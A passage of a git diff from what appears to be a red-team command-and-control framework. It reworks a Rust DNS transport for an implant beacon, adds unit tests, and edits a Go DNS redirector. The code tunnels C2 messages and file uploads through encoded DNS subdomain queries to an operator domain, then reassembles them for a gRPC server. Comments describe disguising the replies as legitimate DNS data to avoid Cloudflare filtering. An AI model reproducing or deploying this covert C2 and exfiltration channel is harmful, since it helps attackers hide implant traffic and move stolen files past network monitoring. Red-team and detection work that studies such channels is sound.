for DNS { .query_pairs() .find(|(k, _)| k == "domain") .map(|(_, v)| v.to_string()) - .unwrap_or_else(|| "example.com".to_string()); + .ok_or_else(|| anyhow::anyhow!("domain parameter is required"))? 
+ .to_string(); + + if base_domain.is_empty() { + return Err(anyhow::anyhow!("domain parameter cannot be empty")); + } // Parse record type from URL (default: TXT) let record_type = parsed @@ -879,9 +970,10 @@ impl Transport for DNS { )?; // Send chunk through channel - if sender.send(chunk_response).is_err() { - return Err(anyhow::anyhow!("Failed to send chunk: receiver dropped")); - } + sender + .send(chunk_response) + .map_err(|_| anyhow::anyhow!("receiver dropped")) + .context("failed to send chunk")?; offset += chunk_len; } @@ -905,9 +997,7 @@ impl Transport for DNS { let handle = tokio::spawn(async move { let mut all_chunks = Vec::new(); - // Iterate over the sync channel receiver in a spawned task to avoid blocking for chunk in request { - // Encrypt each chunk individually (like old implementation) let chunk_bytes = Self::marshal_with_codec::(chunk)?; // Prefix each chunk with its length (4 bytes, big-endian) @@ -921,15 +1011,13 @@ impl Transport for DNS { // Wait for the spawned task to complete let all_chunks = handle .await - .map_err(|e| anyhow::anyhow!("Failed to join chunk collection task: {}", e))??; + .context("failed to join chunk collection task")??; if all_chunks.is_empty() { return Err(anyhow::anyhow!("No file data provided")); } - // Send all chunks as a single DNS exchange (chunks are already individually encrypted) - // This is RAW data - multiple length-prefixed encrypted messages concatenated - // Do NOT encrypt again - pass directly to server + // Send all chunks as a single DNS exchange let response_bytes = self .dns_exchange_raw(all_chunks, "/c2.C2/ReportFile") .await?; @@ -978,3 +1066,499 @@ impl Transport for DNS { vec!["dns".to_string()] } } + +#[cfg(test)] +mod tests { + use super::*; + use pb::dns::PacketType; + + // ============================================================ + // CRC32 Tests + // ============================================================ + + #[test] + fn test_crc32_basic() { + let data = b"test data for CRC 
validation"; + let crc = DNS::calculate_crc32(data); + + // Verify same data produces same CRC + let crc2 = DNS::calculate_crc32(data); + assert_eq!(crc, crc2); + + // Verify different data produces different CRC + let crc3 = DNS::calculate_crc32(b"test datA for CRC validation"); + assert_ne!(crc, crc3); + } + + #[test] + fn test_crc32_known_value() { + // CRC32 IEEE of "123456789" is 0xCBF43926 + let data = b"123456789"; + let crc = DNS::calculate_crc32(data); + assert_eq!(crc, 0xCBF43926); + } + + #[test] + fn test_generate_conv_id_length() { + let conv_id = DNS::generate_conv_id(); + assert_eq!(conv_id.len(), CONV_ID_LENGTH); + } + + #[test] + fn test_generate_conv_id_charset() { + let conv_id = DNS::generate_conv_id(); + for c in conv_id.chars() { + assert!(c.is_ascii_lowercase() || c.is_ascii_digit()); + } + } + + #[test] + fn test_generate_conv_id_uniqueness() { + let id1 = DNS::generate_conv_id(); + let id2 = DNS::generate_conv_id(); + // Statistically, two random 8-char IDs should not be equal + assert_ne!(id1, id2); + } + + #[test] + fn test_encode_data_lowercase() { + let data = b"hello"; + let encoded = DNS::encode_data(data); + + // Should be lowercase + assert_eq!(encoded, encoded.to_lowercase()); + } + + #[test] + fn test_encode_data_valid_chars() { + let data = b"test data with various bytes \x00\xFF"; + let encoded = DNS::encode_data(data); + + // Base32 only uses a-z, 2-7 + for c in encoded.chars() { + assert!( + c.is_ascii_lowercase() || ('2'..='7').contains(&c), + "Invalid char in base32: {}", + c + ); + } + } + + // ============================================================ + // URL Parsing / Transport::new Tests + // ============================================================ + + #[test] + fn test_new_single_server() { + let dns = + DNS::new("dns://8.8.8.8:53?domain=dnsc2.realm.pub".to_string(), None).expect("should parse"); + + assert_eq!(dns.base_domain, "dnsc2.realm.pub"); + assert!(dns.dns_servers.contains(&"8.8.8.8:53".to_string())); + 
assert_eq!(dns.record_type, DnsRecordType::TXT); + } + + #[test] + fn test_new_multiple_servers() { + // Multiple servers are specified in the host portion, comma-separated + let dns = DNS::new( + "dns://8.8.8.8,1.1.1.1:53?domain=dnsc2.realm.pub".to_string(), + None, + ) + .expect("should parse"); + + assert_eq!(dns.dns_servers.len(), 2); + assert!(dns.dns_servers.contains(&"8.8.8.8:53".to_string())); + assert!(dns.dns_servers.contains(&"1.1.1.1:53".to_string())); + } + + #[test] + fn test_new_record_type_a() { + let dns = DNS::new("dns://8.8.8.8?domain=dnsc2.realm.pub&type=a".to_string(), None) + .expect("should parse"); + assert_eq!(dns.record_type, DnsRecordType::A); + } + + #[test] + fn test_new_record_type_aaaa() { + let dns = DNS::new( + "dns://8.8.8.8?domain=dnsc2.realm.pub&type=aaaa".to_string(), + None, + ) + .expect("should parse"); + assert_eq!(dns.record_type, DnsRecordType::AAAA); + } + + #[test] + fn test_new_record_type_txt_default() { + let dns = DNS::new("dns://8.8.8.8?domain=dnsc2.realm.pub".to_string(), None) + .expect("should parse"); + assert_eq!(dns.record_type, DnsRecordType::TXT); + } + + #[test] + fn test_new_wildcard_uses_fallbacks() { + let dns = DNS::new("dns://*?domain=dnsc2.realm.pub".to_string(), None).expect("should parse"); + + // Should have fallback servers + assert!(!dns.dns_servers.is_empty()); + // Fallback servers include known DNS resolvers + let has_fallback = dns.dns_servers.iter().any(|s| { + s.contains("1.1.1.1") || s.contains("8.8.8.8") + }); + assert!(has_fallback, "Should have fallback DNS servers"); + } + + #[test] + fn test_new_missing_domain() { + let result = DNS::new("dns://8.8.8.8:53".to_string(), None); + assert!(result.is_err()); + assert!(result.unwrap_err().to_string().contains("domain parameter is required")); + } + + #[test] + fn test_new_without_scheme() { + let dns = DNS::new("8.8.8.8:53?domain=dnsc2.realm.pub".to_string(), None).expect("should parse"); + assert_eq!(dns.base_domain, "dnsc2.realm.pub"); + 
} + + // ============================================================ + // DNS Packet Building Tests + // ============================================================ + + #[test] + fn test_build_subdomain_simple() { + let dns = DNS { + base_domain: "dnsc2.realm.pub".to_string(), + dns_servers: vec!["8.8.8.8:53".to_string()], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let packet = DnsPacket { + r#type: PacketType::Init.into(), + sequence: 0, + conversation_id: "test1234".to_string(), + data: vec![0x01, 0x02], + crc32: 0, + window_size: SEND_WINDOW_SIZE as u32, + acks: vec![], + nacks: vec![], + }; + + let subdomain = dns.build_subdomain(&packet).expect("should build"); + + // Should end with base domain + assert!(subdomain.ends_with(".dnsc2.realm.pub")); + + // Should not exceed DNS limits + assert!(subdomain.len() <= MAX_DNS_NAME_LENGTH); + + // Each label should be <= 63 chars + for label in subdomain.split('.') { + assert!(label.len() <= MAX_LABEL_LENGTH, "Label too long: {}", label.len()); + } + } + + #[test] + fn test_build_subdomain_label_splitting() { + let dns = DNS { + base_domain: "x.com".to_string(), + dns_servers: vec!["8.8.8.8:53".to_string()], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + // Create a packet with enough data to require label splitting + let packet = DnsPacket { + r#type: PacketType::Data.into(), + sequence: 1, + conversation_id: "test1234".to_string(), + data: vec![0xAA; 50], // 50 bytes of data + crc32: DNS::calculate_crc32(&vec![0xAA; 50]), + window_size: 10, + acks: vec![], + nacks: vec![], + }; + + let subdomain = dns.build_subdomain(&packet).expect("should build"); + + // Should have multiple labels (dots) + let label_count = subdomain.matches('.').count(); + assert!(label_count > 1, "Expected multiple labels, got {}", label_count); + } + + // ============================================================ + // DNS Query Building Tests + // 
============================================================ + + #[test] + fn test_build_dns_query_txt() { + let dns = DNS { + base_domain: "dnsc2.realm.pub".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let (query, txid) = dns.build_dns_query("test.dnsc2.realm.pub").expect("should build"); + + // Header should be 12 bytes minimum + assert!(query.len() > 12); + + // Transaction ID should be in first 2 bytes + let query_txid = u16::from_be_bytes([query[0], query[1]]); + assert_eq!(query_txid, txid); + + // Flags should be standard query (0x0100) + assert_eq!(query[2], 0x01); + assert_eq!(query[3], 0x00); + + // Questions count should be 1 + assert_eq!(query[4], 0x00); + assert_eq!(query[5], 0x01); + } + + // ============================================================ + // DNS Response Parsing Tests + // ============================================================ + + #[test] + fn test_parse_dns_response_too_short() { + let dns = DNS { + base_domain: "".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let short_response = vec![0u8; 10]; // Less than 12 bytes + let result = dns.parse_dns_response(&short_response, 0x1234); + assert!(result.is_err()); + } + + #[test] + fn test_parse_dns_response_txid_mismatch() { + let dns = DNS { + base_domain: "".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + // Response with different transaction ID + let mut response = vec![0u8; 20]; + response[0] = 0x12; + response[1] = 0x34; // txid = 0x1234 + + let result = dns.parse_dns_response(&response, 0x5678); // Expect 0x5678 + assert!(result.is_err()); + assert!(result.unwrap_err().to_string().contains("mismatch")); + } + + // ============================================================ + // Chunk Size Calculation Tests + // ============================================================ + + #[test] + fn 
test_calculate_max_chunk_size_larger_domain_smaller_chunk() { + let dns_short = DNS { + base_domain: "x.co".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let dns_long = DNS { + base_domain: "very.long.subdomain.dnsc2.realm.pub".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let chunk_short = dns_short.calculate_max_chunk_size(10); + let chunk_long = dns_long.calculate_max_chunk_size(10); + + // Longer domain leaves less room for data (or same if both exceed available space) + assert!(chunk_short >= chunk_long); + } + + // ============================================================ + // Validate and Prepare Chunks Tests + // ============================================================ + + #[test] + fn test_validate_and_prepare_chunks_empty() { + let dns = DNS { + base_domain: "dnsc2.realm.pub".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let (chunk_size, total_chunks, crc) = dns.validate_and_prepare_chunks(&[]).unwrap(); + + assert!(chunk_size > 0); + assert_eq!(total_chunks, 1); // Even empty data needs 1 chunk + // CRC is deterministic - just verify it's calculated + assert_eq!(crc, DNS::calculate_crc32(&[])); + } + + #[test] + fn test_validate_and_prepare_chunks_small_data() { + let dns = DNS { + base_domain: "dnsc2.realm.pub".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let data = vec![0xAA; 50]; + let (chunk_size, total_chunks, crc) = dns.validate_and_prepare_chunks(&data).unwrap(); + + assert!(chunk_size > 0); + assert!(total_chunks >= 1); + assert_eq!(crc, DNS::calculate_crc32(&data)); + } + + #[test] + fn test_validate_and_prepare_chunks_exceeds_max() { + let dns = DNS { + base_domain: "dnsc2.realm.pub".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + let 
huge_data = vec![0xFF; MAX_DATA_SIZE + 1]; + let result = dns.validate_and_prepare_chunks(&huge_data); + + assert!(result.is_err()); + assert!(result.unwrap_err().to_string().contains("exceeds maximum")); + } + + // ============================================================ + // Transport Trait Tests + // ============================================================ + + #[test] + fn test_init_creates_empty_transport() { + let dns = DNS::init(); + assert!(dns.base_domain.is_empty()); + assert!(dns.dns_servers.is_empty()); + assert!(!dns.is_active()); + } + + #[test] + fn test_is_active_with_config() { + let dns = DNS { + base_domain: "dnsc2.realm.pub".to_string(), + dns_servers: vec!["8.8.8.8:53".to_string()], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + assert!(dns.is_active()); + } + + #[test] + fn test_is_active_empty_domain() { + let dns = DNS { + base_domain: "".to_string(), + dns_servers: vec!["8.8.8.8:53".to_string()], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + assert!(!dns.is_active()); + } + + #[test] + fn test_is_active_no_servers() { + let dns = DNS { + base_domain: "dnsc2.realm.pub".to_string(), + dns_servers: vec![], + current_server_index: 0, + record_type: DnsRecordType::TXT, + }; + + assert!(!dns.is_active()); + } + + #[test] + fn test_name_returns_dns() { + let dns = DNS::init(); + assert_eq!(dns.name(), "dns"); + } + + #[test] + fn test_list_available() { + let dns = DNS::init(); + let available = dns.list_available(); + assert_eq!(available, vec!["dns".to_string()]); + } + + #[test] + fn test_get_type() { + let mut dns = DNS::init(); + assert_eq!(dns.get_type(), beacon::Transport::Dns); + } + + // ============================================================ + // DnsRecordType Tests + // ============================================================ + + #[test] + fn test_dns_record_type_equality() { + assert_eq!(DnsRecordType::TXT, DnsRecordType::TXT); + assert_eq!(DnsRecordType::A, 
DnsRecordType::A); + assert_eq!(DnsRecordType::AAAA, DnsRecordType::AAAA); + assert_ne!(DnsRecordType::TXT, DnsRecordType::A); + } + + // ============================================================ + // Chunk Response Processing Tests + // ============================================================ + + #[test] + fn test_process_chunk_response_invalid_protobuf() { + let invalid_data = vec![0xFF, 0xFF, 0xFF]; + let result = DNS::process_chunk_response(&invalid_data, 1, 10); + + // Should not error, just mark for retry + assert!(result.is_ok()); + let (_acks, nacks) = result.unwrap(); + assert!(nacks.contains(&1)); + } + + #[test] + fn test_process_chunk_response_valid_status() { + // Create a valid STATUS packet with ACKs + let status_packet = DnsPacket { + r#type: PacketType::Status.into(), + sequence: 0, + conversation_id: "test".to_string(), + data: vec![], + crc32: 0, + window_size: 10, + acks: vec![AckRange { + start_seq: 1, + end_seq: 3, + }], + nacks: vec![5, 6], + }; + + let mut buf = Vec::new(); + status_packet.encode(&mut buf).unwrap(); + + let result = DNS::process_chunk_response(&buf, 1, 10); + assert!(result.is_ok()); + + let (acks, nacks) = result.unwrap(); + assert!(acks.contains(&1)); + assert!(acks.contains(&2)); + assert!(acks.contains(&3)); + assert!(nacks.contains(&5)); + assert!(nacks.contains(&6)); + } +} diff --git a/tavern/internal/c2/dnspb/dns.pb.go b/tavern/internal/c2/dnspb/dns.pb.go index 9f319ef7a..83c2ff9b3 100644 --- a/tavern/internal/c2/dnspb/dns.pb.go +++ b/tavern/internal/c2/dnspb/dns.pb.go @@ -82,8 +82,8 @@ func (PacketType) EnumDescriptor() ([]byte, []int) { type DNSPacket struct { state protoimpl.MessageState `protogen:"open.v1"` Type PacketType `protobuf:"varint,1,opt,name=type,proto3,enum=dns.PacketType" json:"type,omitempty"` // Packet type - Sequence uint32 `protobuf:"varint,2,opt,name=sequence,proto3" json:"sequence,omitempty"` // Chunk sequence number (0-based) - ConversationId string 
`protobuf:"bytes,3,opt,name=conversation_id,json=conversationId,proto3" json:"conversation_id,omitempty"` // 12-character random conversation ID + Sequence uint32 `protobuf:"varint,2,opt,name=sequence,proto3" json:"sequence,omitempty"` // Chunk sequence number (0-based for INIT, 1-based for DATA) + ConversationId string `protobuf:"bytes,3,opt,name=conversation_id,json=conversationId,proto3" json:"conversation_id,omitempty"` // 8-character random conversation ID Data []byte `protobuf:"bytes,4,opt,name=data,proto3" json:"data,omitempty"` // Chunk payload (or InitPayload for INIT packets) Crc32 uint32 `protobuf:"varint,5,opt,name=crc32,proto3" json:"crc32,omitempty"` // Optional CRC32 for validation // Async protocol fields for windowed transmission @@ -307,7 +307,7 @@ func (x *InitPayload) GetFileSize() uint32 { // It specifies which response chunk to retrieve type FetchPayload struct { state protoimpl.MessageState `protogen:"open.v1"` - ChunkIndex uint32 `protobuf:"varint,1,opt,name=chunk_index,json=chunkIndex,proto3" json:"chunk_index,omitempty"` // Which chunk to fetch (0-based) + ChunkIndex uint32 `protobuf:"varint,1,opt,name=chunk_index,json=chunkIndex,proto3" json:"chunk_index,omitempty"` // Which chunk to fetch (1-based) unknownFields protoimpl.UnknownFields sizeCache protoimpl.SizeCache } diff --git a/tavern/internal/c2/proto/dns.proto b/tavern/internal/c2/proto/dns.proto index 6fc76d8aa..308b87254 100644 --- a/tavern/internal/c2/proto/dns.proto +++ b/tavern/internal/c2/proto/dns.proto @@ -17,8 +17,8 @@ enum PacketType { // It is serialized to protobuf, then encoded (Base64/Base58/Base32), and sent as DNS subdomain message DNSPacket { PacketType type = 1; // Packet type - uint32 sequence = 2; // Chunk sequence number (0-based) - string conversation_id = 3; // 12-character random conversation ID + uint32 sequence = 2; // Chunk sequence number (0-based for INIT, 1-based for DATA) + string conversation_id = 3; // 8-character random conversation ID + bytes data = 
4; // Chunk payload (or InitPayload for INIT packets) uint32 crc32 = 5; // Optional CRC32 for validation @@ -46,7 +46,7 @@ message InitPayload { // FetchPayload is the payload for FETCH packets // It specifies which response chunk to retrieve message FetchPayload { - uint32 chunk_index = 1; // Which chunk to fetch (0-based) + uint32 chunk_index = 1; // Which chunk to fetch (1-based) } // ResponseMetadata indicates the response is chunked and must be fetched diff --git a/tavern/internal/redirectors/dns/dns.go b/tavern/internal/redirectors/dns/dns.go index a167d1323..55269f055 100644 --- a/tavern/internal/redirectors/dns/dns.go +++ b/tavern/internal/redirectors/dns/dns.go @@ -44,6 +44,11 @@ const ( txtMaxChunkSize = 255 + // Benign DNS response configuration + // IP address returned for non-C2 A record queries to avoid NXDOMAIN responses + // which can interfere with recursive DNS lookups (e.g., Cloudflare) + benignARecordIP = "0.0.0.0" + // Async protocol configuration MaxActiveConversations = 10000 NormalConversationTimeout = 15 * time.Minute @@ -62,7 +67,7 @@ func init() { type Redirector struct { conversations sync.Map baseDomains []string - conversationCount int32 // Atomic counter for active conversations + conversationCount int32 conversationTimeout time.Duration } @@ -127,7 +132,10 @@ func (r *Redirector) Redirect(ctx context.Context, listenOn string, upstream *gr continue } - go r.handleDNSQuery(ctx, conn, addr, buf[:n], upstream) + // Process query synchronously + queryCopy := make([]byte, n) + copy(queryCopy, buf[:n]) + r.handleDNSQuery(ctx, conn, addr, queryCopy, upstream) } } } @@ -218,12 +226,7 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr domain = strings.ToLower(domain) - // Log ALL queries to track Cloudflare filtering patterns - if queryType == txtRecordType { - slog.Info("TXT query received", "domain", domain, "from", addr.String()) - } else { - slog.Debug("received DNS query", "domain", domain, "query_type", 
queryType, "from", addr.String()) - } + slog.Debug("received DNS query", "domain", domain, "query_type", queryType, "from", addr.String()) // Extract subdomain subdomain, err := r.extractSubdomain(domain) @@ -236,16 +239,14 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr // Decode packet packet, err := r.decodePacket(subdomain) if err != nil { - // Silently drop queries that fail to decode - likely legitimate DNS queries or probes - // Cloudflare forwards all queries under our zone, not just C2 traffic slog.Debug("ignoring non-C2 query", "domain", domain, "error", err) - // For A record queries, return benign IP (127.0.0.1) instead of NXDOMAIN + // For A record queries, return benign IP instead of NXDOMAIN // Cloudflare does recursive lookups on subdomain components - if we return NXDOMAIN - // for the parent subdomain, it won't forward the full TXT query for INIT packets + // for the parent subdomain, it won't forward the full TXT query if queryType == aRecordType { slog.Debug("returning benign A record for non-C2 subdomain", "domain", domain) - r.sendDNSResponse(conn, addr, transactionID, domain, queryType, []byte{127, 0, 0, 1}) + r.sendDNSResponse(conn, addr, transactionID, domain, queryType, net.ParseIP(benignARecordIP).To4()) return } @@ -256,12 +257,10 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr // Validate packet type before processing if packet.Type == dnspb.PacketType_PACKET_TYPE_UNSPECIFIED { - // Invalid/empty packet - likely parsing artifact from random domain slog.Debug("ignoring packet with unspecified type", "domain", domain) - // Return benign A record for A queries to satisfy Cloudflare recursive lookups if queryType == aRecordType { - r.sendDNSResponse(conn, addr, transactionID, domain, queryType, []byte{127, 0, 0, 1}) + r.sendDNSResponse(conn, addr, transactionID, domain, queryType, net.ParseIP(benignARecordIP).To4()) return } @@ -285,7 +284,6 @@ func (r *Redirector) 
handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr } if err != nil { - // Log as WARN since conversation-not-found is expected with UDP packet loss slog.Warn("packet handling failed", "type", packet.Type, "conv_id", packet.ConversationId, "error", err) r.sendErrorResponse(conn, addr, transactionID) return @@ -322,21 +320,14 @@ func (r *Redirector) extractSubdomain(domain string) (string, error) { return "", fmt.Errorf("no matching base domain") } -// decodePacket decodes DNS packet from subdomain -// Subdomain format: . -// The entire protobuf packet is base32-encoded and split into 63-char labels func (r *Redirector) decodePacket(subdomain string) (*dnspb.DNSPacket, error) { - // Remove all dots to get continuous base32 string - // Labels were split at 63-char boundaries, now rejoin them encodedData := strings.ReplaceAll(subdomain, ".", "") - // Decode data using Base32 (case-insensitive, no padding) packetData, err := base32.StdEncoding.WithPadding(base32.NoPadding).DecodeString(strings.ToUpper(encodedData)) if err != nil { return nil, fmt.Errorf("failed to decode Base32 data: %w", err) } - // Unmarshal protobuf var packet dnspb.DNSPacket if err := proto.Unmarshal(packetData, &packet); err != nil { return nil, fmt.Errorf("failed to unmarshal protobuf: %w", err) @@ -355,25 +346,18 @@ func (r *Redirector) decodePacket(subdomain string) (*dnspb.DNSPacket, error) { // handleInitPacket processes INIT packet func (r *Redirector) handleInitPacket(packet *dnspb.DNSPacket) ([]byte, error) { - // Atomically check and increment conversation count - // Loop until we successfully increment or hit the limit for { current := atomic.LoadInt32(&r.conversationCount) if current >= MaxActiveConversations { return nil, fmt.Errorf("max active conversations reached: %d", current) } - // Try to increment atomically if atomic.CompareAndSwapInt32(&r.conversationCount, current, current+1) { - // Successfully incremented, break out break } - // CAS failed (another goroutine 
modified the value), retry } - // Unmarshal init payload var initPayload dnspb.InitPayload if err := proto.Unmarshal(packet.Data, &initPayload); err != nil { - // Decrement on error since we already incremented atomic.AddInt32(&r.conversationCount, -1) return nil, fmt.Errorf("failed to unmarshal init payload: %w", err) } @@ -384,7 +368,6 @@ func (r *Redirector) handleInitPacket(packet *dnspb.DNSPacket) ([]byte, error) { return nil, fmt.Errorf("data size exceeds maximum: %d > %d bytes", initPayload.FileSize, MaxDataSize) } - // Validate that FileSize is set (protobuf default is 0) if initPayload.FileSize == 0 && initPayload.TotalChunks > 0 { slog.Warn("INIT packet missing file_size field", "conv_id", packet.ConversationId, "total_chunks", initPayload.TotalChunks) } @@ -392,7 +375,6 @@ func (r *Redirector) handleInitPacket(packet *dnspb.DNSPacket) ([]byte, error) { slog.Debug("creating conversation", "conv_id", packet.ConversationId, "method", initPayload.MethodCode, "total_chunks", initPayload.TotalChunks, "file_size", initPayload.FileSize, "crc32", initPayload.DataCrc32) - // Create conversation conv := &Conversation{ ID: packet.ConversationId, MethodPath: initPayload.MethodCode, @@ -406,11 +388,9 @@ func (r *Redirector) handleInitPacket(packet *dnspb.DNSPacket) ([]byte, error) { r.conversations.Store(packet.ConversationId, conv) - slog.Info("C2 conversation started", "conv_id", conv.ID, "method", conv.MethodPath, + slog.Debug("C2 conversation started", "conv_id", conv.ID, "method", conv.MethodPath, "total_chunks", conv.TotalChunks, "data_size", initPayload.FileSize) - // Return empty STATUS packet (no ACKs/NACKs yet) to look like legitimate DNS data - // Don't return plain text "ok" which could trigger Cloudflare filters statusPacket := &dnspb.DNSPacket{ Type: dnspb.PacketType_PACKET_TYPE_STATUS, ConversationId: packet.ConversationId, @@ -430,7 +410,6 @@ func (r *Redirector) handleInitPacket(packet *dnspb.DNSPacket) ([]byte, error) { func (r *Redirector) 
handleDataPacket(ctx context.Context, upstream *grpc.ClientConn, packet *dnspb.DNSPacket, queryType uint16) ([]byte, error) { val, ok := r.conversations.Load(packet.ConversationId) if !ok { - // Log at debug - this is normal with UDP packet loss/reordering (INIT may arrive later) slog.Debug("DATA packet for unknown conversation (INIT may be lost/delayed)", "conv_id", packet.ConversationId, "seq", packet.Sequence) return nil, fmt.Errorf("conversation not found: %s", packet.ConversationId) @@ -440,24 +419,20 @@ func (r *Redirector) handleDataPacket(ctx context.Context, upstream *grpc.Client conv.mu.Lock() defer conv.mu.Unlock() - // Validate sequence number if packet.Sequence < 1 || packet.Sequence > conv.TotalChunks { return nil, fmt.Errorf("sequence out of bounds: %d (expected 1-%d)", packet.Sequence, conv.TotalChunks) } - // Store chunk (sequence is 1-indexed, overwrites duplicates safely) conv.Chunks[packet.Sequence] = packet.Data conv.LastActivity = time.Now() slog.Debug("received chunk", "conv_id", conv.ID, "seq", packet.Sequence, "size", len(packet.Data), "total", len(conv.Chunks)) - // Check if conversation is complete and auto-process if uint32(len(conv.Chunks)) == conv.TotalChunks && !conv.Completed { conv.Completed = true - slog.Info("C2 request complete, forwarding to upstream", "conv_id", conv.ID, + slog.Debug("C2 request complete, forwarding to upstream", "conv_id", conv.ID, "method", conv.MethodPath, "total_chunks", conv.TotalChunks, "data_size", conv.ExpectedDataSize) - // Unlock before calling processCompletedConversation (it will re-lock) conv.mu.Unlock() if err := r.processCompletedConversation(ctx, upstream, conv, queryType); err != nil { slog.Error("failed to process completed conversation", "conv_id", conv.ID, "error", err) @@ -465,7 +440,6 @@ func (r *Redirector) handleDataPacket(ctx context.Context, upstream *grpc.Client conv.mu.Lock() } - // Build ACK/NACK response (STATUS packet) acks, nacks := r.computeAcksNacks(conv) statusPacket := 
&dnspb.DNSPacket{ @@ -475,7 +449,6 @@ func (r *Redirector) handleDataPacket(ctx context.Context, upstream *grpc.Client Nacks: nacks, } - // Marshal STATUS packet to return as response statusData, err := proto.Marshal(statusPacket) if err != nil { return nil, fmt.Errorf("failed to marshal status packet: %w", err) @@ -489,7 +462,7 @@ func (r *Redirector) processCompletedConversation(ctx context.Context, upstream conv.mu.Lock() defer conv.mu.Unlock() - // Reassemble data (chunks are 1-indexed) + // Reassemble data var fullData []byte for i := uint32(1); i <= conv.TotalChunks; i++ { chunk, ok := conv.Chunks[i] @@ -499,10 +472,8 @@ func (r *Redirector) processCompletedConversation(ctx context.Context, upstream fullData = append(fullData, chunk...) } - // Verify CRC actualCRC := crc32.ChecksumIEEE(fullData) if actualCRC != conv.ExpectedCRC { - // Clean up on fatal error r.conversations.Delete(conv.ID) atomic.AddInt32(&r.conversationCount, -1) return fmt.Errorf("data CRC mismatch: expected %d, got %d", conv.ExpectedCRC, actualCRC) @@ -510,24 +481,19 @@ func (r *Redirector) processCompletedConversation(ctx context.Context, upstream slog.Debug("reassembled data", "conv_id", conv.ID, "size", len(fullData), "method", conv.MethodPath) - // Validate reassembled size matches client-provided data size (if provided) if conv.ExpectedDataSize > 0 && uint32(len(fullData)) != conv.ExpectedDataSize { - // Clean up on fatal error r.conversations.Delete(conv.ID) atomic.AddInt32(&r.conversationCount, -1) return fmt.Errorf("reassembled data size mismatch: expected %d bytes, got %d bytes", conv.ExpectedDataSize, len(fullData)) } - // Forward to upstream gRPC server responseData, err := r.forwardToUpstream(ctx, upstream, conv.MethodPath, fullData) if err != nil { - // Clean up on fatal error r.conversations.Delete(conv.ID) atomic.AddInt32(&r.conversationCount, -1) return fmt.Errorf("failed to forward to upstream: %w", err) } - // Determine max response size based on record type var maxSize 
int switch queryType { case txtRecordType: @@ -540,13 +506,10 @@ func (r *Redirector) processCompletedConversation(ctx context.Context, upstream maxSize = 400 } - // Check if response needs chunking if len(responseData) > maxSize { - // Calculate CRC for full response conv.ResponseCRC = crc32.ChecksumIEEE(responseData) conv.ResponseData = responseData - // Split into chunks conv.ResponseChunks = nil for i := 0; i < len(responseData); i += maxSize { end := i + maxSize @@ -561,7 +524,6 @@ func (r *Redirector) processCompletedConversation(ctx context.Context, upstream slog.Debug("response chunked", "conv_id", conv.ID, "total_size", len(responseData), "chunks", len(conv.ResponseChunks), "crc32", conv.ResponseCRC) } else { - // Response fits in single packet conv.ResponseData = responseData conv.LastActivity = time.Now() @@ -574,14 +536,13 @@ func (r *Redirector) processCompletedConversation(ctx context.Context, upstream // computeAcksNacks computes ACK ranges and NACK list for a conversation // Must be called with conv.mu locked func (r *Redirector) computeAcksNacks(conv *Conversation) ([]*dnspb.AckRange, []uint32) { - // Build sorted list of received sequences received := make([]uint32, 0, len(conv.Chunks)) for seq := range conv.Chunks { received = append(received, seq) } sort.Slice(received, func(i, j int) bool { return received[i] < received[j] }) - // Compute ACK ranges (contiguous blocks) + // Compute ACK ranges acks := []*dnspb.AckRange{} if len(received) > 0 { start := received[0] @@ -599,16 +560,13 @@ func (r *Redirector) computeAcksNacks(conv *Conversation) ([]*dnspb.AckRange, [] acks = append(acks, &dnspb.AckRange{StartSeq: start, EndSeq: end}) } - // Limit ACK ranges if len(acks) > MaxAckRangesInResponse { acks = acks[:MaxAckRangesInResponse] } - // Compute NACKs (missing sequences in gaps) nacks := []uint32{} if len(received) > 0 { - // Find gaps between first and last received minReceived := received[0] maxReceived := received[len(received)-1] @@ -647,12 
+605,8 @@ func (r *Redirector) handleFetchPacket(packet *dnspb.DNSPacket) ([]byte, error) conv.LastActivity = time.Now() - // Check if response was chunked if len(conv.ResponseChunks) > 0 { - // Empty data = metadata request - // Non-empty data = FetchPayload with 1-based chunk_index if len(packet.Data) == 0 { - // Return ResponseMetadata metadata := &dnspb.ResponseMetadata{ TotalChunks: uint32(len(conv.ResponseChunks)), DataCrc32: conv.ResponseCRC, @@ -669,13 +623,11 @@ func (r *Redirector) handleFetchPacket(packet *dnspb.DNSPacket) ([]byte, error) return metadataBytes, nil } - // Parse FetchPayload - chunk_index is 1-based var fetchPayload dnspb.FetchPayload if err := proto.Unmarshal(packet.Data, &fetchPayload); err != nil { return nil, fmt.Errorf("failed to unmarshal fetch payload: %w", err) } - // Convert 1-based to 0-based array index chunkIndex := int(fetchPayload.ChunkIndex) - 1 if chunkIndex < 0 || chunkIndex >= len(conv.ResponseChunks) { @@ -688,9 +640,6 @@ func (r *Redirector) handleFetchPacket(packet *dnspb.DNSPacket) ([]byte, error) return conv.ResponseChunks[chunkIndex], nil } - // Single response (not chunked) - // Don't delete immediately - rely on timeout-based cleanup - slog.Debug("returning response", "conv_id", conv.ID, "size", len(conv.ResponseData)) return conv.ResponseData, nil @@ -698,11 +647,9 @@ func (r *Redirector) handleFetchPacket(packet *dnspb.DNSPacket) ([]byte, error) // forwardToUpstream sends request to gRPC server and returns response func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.ClientConn, methodPath string, requestData []byte) ([]byte, error) { - // Create gRPC stream with the raw codec md := metadata.New(map[string]string{}) ctx = 